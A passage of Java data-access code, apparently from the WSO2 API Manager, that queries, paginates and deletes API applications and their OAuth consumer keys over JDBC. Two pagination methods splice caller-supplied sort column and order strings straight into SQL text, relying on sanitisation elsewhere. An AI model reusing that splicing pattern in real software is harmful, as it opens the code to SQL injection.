+ appName + " from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return false; } /** * @param username Subscriber * @return ApplicationId for given appname. * @throws APIManagementException if failed to get Applications for given subscriber. */ public int getApplicationId(String appName, String username) throws APIManagementException { if (username == null) { return 0; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, subscriber.getId()); prepStmt.setString(2, appName); rs = prepStmt.executeQuery(); while (rs.next()) { appId = rs.getInt("APPLICATION_ID"); } } catch (SQLException e) { handleException("Error when getting the application id from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return appId; } /** * Find the name of the application by Id * * @param applicationId - applicatoin id * @return - application name * @throws APIManagementException */ public String getApplicationNameFromId(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String appName = null; String sqlQuery = SQLConstants.GET_APPLICATION_NAME_FROM_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); rs = prepStmt.executeQuery(); while (rs.next()) { appName = rs.getString("NAME"); } } catch (SQLException e) { handleException("Error when getting the application name for id " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return appName; } public int getAllApplicationCount(Subscriber subscriber, String groupingId, String search) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String sqlQuery = null; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE_WITH_MULTIGROUPID; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE_WITH_MULTIGROUPID; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupingId.split(","); int noOfParams = grpIdArray.length; prepStmt = fillQueryParams(connection, sqlQuery, grpIdArray, 1); prepStmt.setString(++noOfParams, tenantDomain); prepStmt.setString(++noOfParams, subscriber.getName()); prepStmt.setString(++noOfParams, "%" + search + "%"); } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE_WITHGROUPID; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE_WITHGROUPID; } prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); prepStmt.setString(3, "%" + search + "%"); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE; } prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, subscriber.getName()); prepStmt.setString(2, "%" + search + "%"); } resultSet = prepStmt.executeQuery(); int applicationCount = 0; if (resultSet != null) { while (resultSet.next()) { applicationCount = resultSet.getInt("count"); } } if (applicationCount > 0) { return applicationCount; } } catch (SQLException e) { handleException("Failed to get applicaiton count : ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return 0; } /** * Returns all applications created by given user Id * * @param userId * @return * @throws APIManagementException */ public Application[] getApplicationsByOwner(String userId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String appName = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATIONS_BY_OWNER; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, userId); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("UUID")); application.setName(rs.getString("NAME")); application.setOwner(rs.getString("CREATED_BY")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(rs.getInt("APPLICATION_ID"))); } applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when getting the application name for id " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Returns all applications created by given user Id * * @param userName * @return * @throws APIManagementException */ public boolean updateApplicationOwner(String userName, Application application) throws APIManagementException { boolean isAppUpdated = false; Connection connection = null; PreparedStatement prepStmt = null; String appName = null; String sqlQuery = SQLConstants.UPDATE_APPLICATION_OWNER; try { Subscriber subscriber = getSubscriber(userName); if (subscriber != null) { int subscriberId = getSubscriber(userName).getId(); connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, userName); prepStmt.setInt(2, subscriberId); prepStmt.setString(3, application.getUUID()); prepStmt.executeUpdate(); isAppUpdated = true; } else { String errorMessage = "Error when retrieving subscriber details for user " + userName; handleException(errorMessage, new APIManagementException(errorMessage)); } } catch (SQLException e) { handleException("Error when updating application owner for user " + userName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } return isAppUpdated; } /** * #TODO later we might need to use only this method. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @param start The start index. * @param offset The offset. * @param search The search string. * @param sortOrder The sort order. * @param sortColumn The sort column. * @return Application[] The array of applications. * @throws APIManagementException */ public Application[] getApplicationsWithPagination(Subscriber subscriber, String groupingId, int start, int offset, String search, String sortColumn, String sortOrder) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = null; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE_WITH_MULTIGROUPID"); } else { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE_WITH_MULTIGROUPID"); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE_WITHGROUPID"); } else { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE_WITHGROUPID"); } } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE"); } else { sqlQuery = SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE"); } } try { connection = APIMgtDBUtil.getConnection(); // sortColumn, sortOrder variable values has sanitized in jaggery level (applications-list.jag)for security. sqlQuery = sqlQuery.replace("$1", sortColumn); sqlQuery = sqlQuery.replace("$2", sortOrder); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupingId.split(","); int noOfParams = grpIdArray.length; prepStmt = fillQueryParams(connection, sqlQuery, grpIdArray, 1); prepStmt.setString(++noOfParams, tenantDomain); prepStmt.setString(++noOfParams, subscriber.getName()); prepStmt.setString(++noOfParams, tenantDomain + '/' + groupingId); prepStmt.setString(++noOfParams, "%" + search + "%"); prepStmt.setInt(++noOfParams, start); prepStmt.setInt(++noOfParams, offset); } else { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); prepStmt.setString(3, "%" + search + "%"); prepStmt.setInt(4, start); prepStmt.setInt(5, offset); } } else { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, subscriber.getName()); prepStmt.setString(2, "%" + search + "%"); prepStmt.setInt(3, start); prepStmt.setInt(4, offset); } rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("NAME"), subscriber); application.setId(rs.getInt("APPLICATION_ID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setIsBlackListed(rs.getBoolean("ENABLED")); application.setOwner(rs.getString("CREATED_BY")); if (multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Returns all the applications associated with given subscriber and group id. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @return Application[] Array of applications. * @throws APIManagementException */ public Application[] getApplications(Subscriber subscriber, String groupingId) throws APIManagementException { Application[] applications = getLightWeightApplications(subscriber, groupingId); for (Application application : applications) { Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } } return applications; } /** * Returns all the applications associated with given subscriber and group id, without their keys. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @return Application[] Array of applications. * @throws APIManagementException */ public Application[] getLightWeightApplications(Subscriber subscriber, String groupingId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATIONS_PREFIX; String whereClauseWithGroupId; String whereClauseWithMultiGroupId; if (forceCaseInsensitiveComparisons) { if (multiGroupAppSharingEnabled) { whereClauseWithGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR (LOWER(SUB.USER_ID) = LOWER(?))" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; } else { whereClauseWithGroupId = " AND " + " (GROUP_ID= ? " + " OR " + " ((GROUP_ID='' OR GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?))) "; } } else { if (multiGroupAppSharingEnabled) { whereClauseWithGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR ( SUB.USER_ID = ? )" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) "; } else { whereClauseWithGroupId = " AND " + " (GROUP_ID= ? " + " OR " + " ((GROUP_ID='' OR GROUP_ID IS NULL) AND SUB.USER_ID=?))"; } } String whereClause; if (forceCaseInsensitiveComparisons) { whereClause = " AND " + " LOWER(SUB.USER_ID) = LOWER(?)"; } else { whereClause = " AND " + " SUB.USER_ID = ?"; } if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { sqlQuery += whereClauseWithGroupId; } else { sqlQuery += whereClause; } try { connection = APIMgtDBUtil.getConnection(); String blockingFilerSql = null; if (connection.getMetaData().getDriverName().contains("MS SQL") || connection.getMetaData().getDriverName().contains("Microsoft")) { sqlQuery = sqlQuery.replaceAll("NAME", "cast(NAME as varchar(100)) collate " + "SQL_Latin1_General_CP1_CI_AS as NAME"); blockingFilerSql = " select distinct x.*,bl.ENABLED from ( " + sqlQuery + " )x left join " + "AM_BLOCK_CONDITIONS bl on ( bl.TYPE = 'APPLICATION' AND bl.VALUE = (x.USER_ID + ':') + x" + ".name)"; } else { blockingFilerSql = " select distinct x.*,bl.ENABLED from ( " + sqlQuery + " )x left join AM_BLOCK_CONDITIONS bl on ( bl.TYPE = 'APPLICATION' AND bl.VALUE = " + "concat(concat(x.USER_ID,':'),x.name))"; } if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); int paramIndex = groupIDArray.length; prepStmt = fillQueryParams(connection, blockingFilerSql, groupIDArray, 1); prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriber.getName()); prepStmt.setString(++paramIndex, tenantDomain + '/' + groupingId); } else { prepStmt = connection.prepareStatement(blockingFilerSql); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); } } else { prepStmt = connection.prepareStatement(blockingFilerSql); prepStmt.setString(1, subscriber.getName()); } rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; Map<String,String> applicationAttributes; int applicationId = 0; while (rs.next()) { applicationId = rs.getInt("APPLICATION_ID"); application = new Application(rs.getString("NAME"), subscriber); application.setId(applicationId); application.setTier(rs.getString("APPLICATION_TIER")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setIsBlackListed(rs.getBoolean("ENABLED")); application.setOwner(rs.getString("CREATED_BY")); application.setTokenType(rs.getString("TOKEN_TYPE")); applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); if (multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } applicationsList.add(application); } Collections.sort(applicationsList, new Comparator<Application>() { public int compare(Application o1, Application o2) { return o1.getName().compareToIgnoreCase(o2.getName()); } }); applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Returns applications within a tenant domain with pagination * @param tenantId The tenantId. * @param start The start index. * @param offset The offset. * @param searchOwner The search string. * @param searchApplication The search string. * @param sortOrder The sort order. * @param sortColumn The sort column. * @return Application[] The array of applications. * @throws APIManagementException */ public List<Application> getApplicationsByTenantIdWithPagination(int tenantId, int start, int offset, String searchOwner, String searchApplication, String sortColumn, String sortOrder) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application applications = null; String sqlQuery = null; List<Application> applicationList = new ArrayList<>(); sqlQuery = SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_BY_TENANT_ID"); try { connection = APIMgtDBUtil.getConnection(); sqlQuery = sqlQuery.replace("$1", sortColumn); sqlQuery = sqlQuery.replace("$2", sortOrder); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, tenantId); prepStmt.setString(2, "%" + searchOwner + "%"); prepStmt.setString(3, "%" + searchApplication + "%"); prepStmt.setInt(4, start); prepStmt.setInt(5, offset); rs = prepStmt.executeQuery(); Application application; while (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberName = rs.getString("CREATED_BY"); Subscriber subscriber = new Subscriber(subscriberName); application = new Application(applicationName, subscriber); application.setName(applicationName); application.setId(rs.getInt("APPLICATION_ID")); application.setUUID(rs.getString("UUID")); application.setGroupId(rs.getString("GROUP_ID")); subscriber.setTenantId(rs.getInt("TENANT_ID")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); application.setOwner(subscriberName); applicationList.add(application); } } catch (SQLException e) { handleException("Error while obtaining details of the Application for tenant id : " + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applicationList; } public int getApplicationsCount(int tenantId, String searchOwner, String searchApplication) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String sqlQuery = null; try { connection = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_APPLICATIONS_COUNT; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, tenantId); prepStmt.setString(2, "%" + searchOwner + "%"); prepStmt.setString(3, "%" + searchApplication + "%"); resultSet = prepStmt.executeQuery(); int applicationCount = 0; if (resultSet != null) { while (resultSet.next()) { applicationCount = resultSet.getInt("count"); } } if (applicationCount > 0) { return applicationCount; } } catch (SQLException e) { handleException("Failed to get application count of tenant id : " + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return 0; } public Application[] getAllApplicationsOfTenantForMigration(String appTenantDomain) throws APIManagementException { Connection connection; PreparedStatement prepStmt = null; ResultSet rs; Application[] applications = null; String sqlQuery = SQLConstants.GET_SIMPLE_APPLICATIONS; String tenantFilter = "AND SUB.TENANT_ID=?"; sqlQuery += tenantFilter ; try { connection = APIMgtDBUtil.getConnection(); int appTenantId = APIUtil.getTenantIdFromTenantDomain(appTenantDomain); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, appTenantId); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(Integer.parseInt(rs.getString("APPLICATION_ID"))); application.setName(rs.getString("NAME")); application.setOwner(rs.getString("CREATED_BY")); applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from the persistence store.", e); } finally { if (prepStmt != null) { try { prepStmt.close(); } catch (SQLException e) { log.warn("Database error. Could not close Statement. Continuing with others." + e.getMessage(), e); } } } return applications; } /** * Returns all the consumerkeys of application which are subscribed for the given api * * @param identifier APIIdentifier * @return Consumerkeys * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get Applications for given subscriber. */ public String[] getConsumerKeys(APIIdentifier identifier) throws APIManagementException { Set<String> consumerKeys = new HashSet<String>(); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int apiId; String sqlQuery = SQLConstants.GET_CONSUMER_KEYS_SQL; try { connection = APIMgtDBUtil.getConnection(); apiId = getAPIID(identifier, connection); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, apiId); rs = prepStmt.executeQuery(); while (rs.next()) { consumerKeys.add(rs.getString("CONSUMER_KEY")); } } catch (SQLException e) { handleException("Error when reading application subscription information", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKeys.toArray(new String[consumerKeys.size()]); } /** * Deletes an Application along with subscriptions, keys and registration data * * @param application Application object to be deleted from the database which has the application Id * @throws APIManagementException */ public void deleteApplication(Application application) throws APIManagementException { Connection connection = null; PreparedStatement deleteMappingQuery = null; PreparedStatement prepStmt = null; PreparedStatement prepStmtGetConsumerKey = null; PreparedStatement deleteRegistrationQuery = null; PreparedStatement deleteSubscription = null; PreparedStatement deleteDomainApp = null; PreparedStatement deleteAppKey = null; PreparedStatement deleteApp = null; ResultSet rs = null; String getSubscriptionsQuery = SQLConstants.GET_SUBSCRIPTION_ID_OF_APPLICATION_SQL; String getConsumerKeyQuery = SQLConstants.GET_CONSUMER_KEY_OF_APPLICATION_SQL; String deleteKeyMappingQuery = SQLConstants.REMOVE_APPLICATION_FROM_SUBSCRIPTION_KEY_MAPPINGS_SQL; String deleteSubscriptionsQuery = SQLConstants.REMOVE_APPLICATION_FROM_SUBSCRIPTIONS_SQL; String deleteApplicationKeyQuery = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATION_KEY_MAPPINGS_SQL; String deleteDomainAppQuery = SQLConstants.REMOVE_APPLICATION_FROM_DOMAIN_MAPPINGS_SQL; String deleteApplicationQuery = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATIONS_SQL; String deleteRegistrationEntry = SQLConstants.REMOVE_APPLICATION_FROM_APPLICATION_REGISTRATIONS_SQL; boolean transactionCompleted = true; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(getSubscriptionsQuery); prepStmt.setInt(1, application.getId()); rs = prepStmt.executeQuery(); if (multiGroupAppSharingEnabled) { transactionCompleted = updateGroupIDMappings(connection, application.getId(), null, null); } List<Integer> subscriptions = new ArrayList<Integer>(); while (rs.next()) { subscriptions.add(rs.getInt("SUBSCRIPTION_ID")); } deleteMappingQuery = connection.prepareStatement(deleteKeyMappingQuery); for (Integer subscriptionId : subscriptions) { deleteMappingQuery.setInt(1, subscriptionId); deleteMappingQuery.addBatch(); } deleteMappingQuery.executeBatch(); if (log.isDebugEnabled()) { log.debug("Subscription Key mapping details are deleted successfully for Application - " + application.getName()); } deleteRegistrationQuery = connection.prepareStatement(deleteRegistrationEntry); deleteRegistrationQuery.setInt(1, application.getId()); deleteRegistrationQuery.execute(); if (log.isDebugEnabled()) { log.debug("Application Registration details are deleted successfully for Application - " + application.getName()); } deleteSubscription = connection.prepareStatement(deleteSubscriptionsQuery); deleteSubscription.setInt(1, application.getId()); deleteSubscription.execute(); if (log.isDebugEnabled()) { log.debug("Subscription details are deleted successfully for Application - " + application.getName()); } prepStmtGetConsumerKey = connection.prepareStatement(getConsumerKeyQuery); prepStmtGetConsumerKey.setInt(1, application.getId()); rs = prepStmtGetConsumerKey.executeQuery(); ArrayList<String> consumerKeys = new ArrayList<String>(); deleteDomainApp = connection.prepareStatement(deleteDomainAppQuery); while (rs.next()) { String consumerKey = rs.getString("CONSUMER_KEY"); // This is true when OAuth app has been created by pasting consumer key/secret in the screen. String mode = rs.getString("CREATE_MODE"); if (consumerKey != null) { deleteDomainApp.setString(1, consumerKey); deleteDomainApp.addBatch(); KeyManagerHolder.getKeyManagerInstance().deleteMappedApplication(consumerKey); // OAuth app is deleted if only it has been created from API Store. For mapped clients we don't // call delete. if (!"MAPPED".equals(mode)) { // Adding clients to be deleted. consumerKeys.add(consumerKey); } } } deleteDomainApp.executeBatch(); deleteAppKey = connection.prepareStatement(deleteApplicationKeyQuery); deleteAppKey.setInt(1, application.getId()); deleteAppKey.execute(); if (log.isDebugEnabled()) { log.debug("Application Key Mapping details are deleted successfully for Application - " + application .getName()); } deleteApp = connection.prepareStatement(deleteApplicationQuery); deleteApp.setInt(1, application.getId()); deleteApp.execute(); if (log.isDebugEnabled()) { log.debug("Application " + application.getName() + " is deleted successfully."); } if (transactionCompleted) { connection.commit(); } for (String consumerKey : consumerKeys) { //delete on oAuthorization server. KeyManagerHolder.getKeyManagerInstance().deleteApplication(consumerKey); } } catch (SQLException e) { handleException("Error while removing application details from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtGetConsumerKey, connection, rs); APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); APIMgtDBUtil.closeAllConnections(deleteApp, null, null); APIMgtDBUtil.closeAllConnections(deleteAppKey, null, null); APIMgtDBUtil.closeAllConnections(deleteMappingQuery, null, null); APIMgtDBUtil.closeAllConnections(deleteRegistrationQuery, null, null); APIMgtDBUtil.closeAllConnections(deleteSubscription, null, null); APIMgtDBUtil.closeAllConnections(deleteDomainApp, null, null); APIMgtDBUtil.closeAllConnections(deleteAppKey, null, null); APIMgtDBUtil.closeAllConnections(deleteApp, null, null); } } public APIKey[] getConsumerKeysWithMode(int appId, String mode) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; ArrayList<APIKey> consumerKeys = new ArrayList<APIKey>(); String getConsumerKeyQuery = SQLConstants.GET_CONSUMER_KEY_WITH_MODE_SLQ; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(getConsumerKeyQuery); prepStmt.setInt(1, appId); prepStmt.setString(2, mode); rs = prepStmt.executeQuery(); while (rs.next()) { String consumerKey = rs.getString("CONSUMER_KEY"); if (consumerKey != null && !consumerKey.isEmpty()) { APIKey apiKey = new APIKey(); apiKey.setConsumerKey(consumerKey); apiKey.setType(rs.getString("KEY_TYPE")); consumerKeys.add(apiKey); } } } catch (SQLException e) { String msg = "Error occurred while getting consumer keys"; log.error(msg, e); throw new APIManagementException(msg, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKeys.toArray(new APIKey[consumerKeys.size()]); } /** * Returns the consumer Key for a given Application Name, Subscriber Name, Key Type, Grouping Id combination. * * @param applicationName Name of the Application. * @param subscriberId Name of Subscriber. * @param keyType PRODUCTION | SANDBOX. * @param groupingId Grouping ID. When set to null query will be performed using the other three values. * @return Consumer Key matching the provided combination. * @throws APIManagementException */ public String getConsumerKeyForApplicationKeyType(String applicationName, String subscriberId, String keyType, String groupingId) throws APIManagementException { String consumerKey = null; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_CONSUMER_KEY_FOR_APPLICATION_KEY_TYPE_SQL; String whereSubscriberUserID = "SUB.USER_ID = ?"; if (forceCaseInsensitiveComparisons) { whereSubscriberUserID = "lower(SUB.USER_ID) = ?"; subscriberId = subscriberId.toLowerCase(); } String whereClauseWithGroupId = " AND " + "(APP.GROUP_ID= ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND " + whereSubscriberUserID + "))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR " + whereSubscriberUserID + ")"; String whereClause = " AND " + whereSubscriberUserID; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(subscriberId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); sqlQuery += whereClauseWithMultiGroupId; prepStmt = fillQueryParams(connection, sqlQuery, groupIDArray, 3); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); int paramIndex = groupIDArray.length + 2; prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriberId); } else { sqlQuery += whereClauseWithGroupId; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); prepStmt.setString(3, groupingId); prepStmt.setString(4, subscriberId); } } else { sqlQuery += whereClause; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, applicationName); prepStmt.setString(2, keyType); prepStmt.setString(3, subscriberId); } rs = prepStmt.executeQuery(); while (rs.next()) { consumerKey = rs.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKey; } /** * Returns the consumer Key for a given Application Name, Subscriber Name, Key Type, Grouping Id combination. * * @param applicationId Id of the Application. * @param subscriberId Name of Subscriber. * @param keyType PRODUCTION | SANDBOX. * @param groupingId Grouping ID. When set to null query will be performed using the other three values. * @return Consumer Key matching the provided combination. * @throws APIManagementException */ public String getConsumerKeyForApplicationKeyType(int applicationId, String subscriberId, String keyType, String groupingId) throws APIManagementException { String consumerKey = null; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_CONSUMER_KEY_FOR_APPLICATION_KEY_TYPE_BY_APP_ID_SQL; String whereSubscriberUserID = "SUB.USER_ID = ?"; if (forceCaseInsensitiveComparisons) { whereSubscriberUserID = "lower(SUB.USER_ID) = ?"; subscriberId = subscriberId.toLowerCase(); } String whereClauseWithGroupId = " AND " + "(APP.GROUP_ID= ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND " + whereSubscriberUserID + "))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR " + whereSubscriberUserID + ")"; String whereClause = " AND " + whereSubscriberUserID; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(subscriberId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); sqlQuery += whereClauseWithMultiGroupId; prepStmt = fillQueryParams(connection, sqlQuery, groupIDArray, 3); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); int paramIndex = groupIDArray.length + 2; prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriberId); } else { sqlQuery += whereClauseWithGroupId; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); prepStmt.setString(3, groupingId); prepStmt.setString(4, subscriberId); } } else { sqlQuery += whereClause; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); prepStmt.setString(2, keyType); prepStmt.setString(3, subscriberId); } rs = prepStmt.executeQuery(); while (rs.next()) { consumerKey = rs.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Error when reading the application information from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKey; } /** * This method will return a java Map that contains application ID and token type. * * @param consumerKey consumer key of the oAuth application. * @return Map. * @throws APIManagementException */ public Map<String, String> getApplicationIdAndTokenTypeByConsumerKey(String consumerKey) throws APIManagementException { Map<String, String> appIdAndConsumerKey = new HashMap<String, String>(); if (log.isDebugEnabled()) { log.debug("fetching application id and token type by consumer key " + consumerKey); } 